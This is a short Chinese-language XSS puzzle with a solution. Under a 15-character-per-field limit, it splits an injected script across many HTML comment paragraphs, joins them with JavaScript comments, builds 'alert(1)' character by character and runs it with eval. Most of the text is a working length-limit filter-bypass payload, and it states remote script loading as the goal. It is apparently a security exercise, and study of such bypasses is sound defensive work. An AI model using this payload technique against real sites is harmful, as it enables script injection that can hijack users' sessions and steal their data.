要求至少在Chrome, Firefox能加载远程js
可控无限个<p>,每個输入点限制15个字符,每個输入点均獨立,且只过滤了加号(+)
不允許使用 window.name,document.URL 等輔助
不允許使用 window.name,document.URL 等輔助
解答一:
<p class="comment" title=""><script>/*" data-comment='{"id":1}'></p><p class="comment" title="*/x=new Array();/*" data-comment='{"id":1}'></p><p class="comment" title="*/x[0]='a';/*" data-comment='{"id":1}'></p><p class="comment" title="*/x[1]='l';/*" data-comment='{"id":1}'></p><p class="comment" title="*/x[2]='e';/*" data-comment='{"id":1}'></p><p class="comment" title="*/x[3]='r';/*" data-comment='{"id":1}'></p><p class="comment" title="*/x[4]='t';/*" data-comment='{"id":1}'></p><p class="comment" title="*/x[5]='(';/*" data-comment='{"id":1}'></p><p class="comment" title="*/x[6]='1';/*" data-comment='{"id":1}'></p><p class="comment" title="*/x[7]=')';/*" data-comment='{"id":1}'></p><p class="comment" title="*/y=x.join('');/*" data-comment='{"id":1}'></p><p class="comment" title="*/eval(y);/*" data-comment='{"id":1}'></p><p class="comment" title="*/</script>" data-comment='{"id":1}'></p>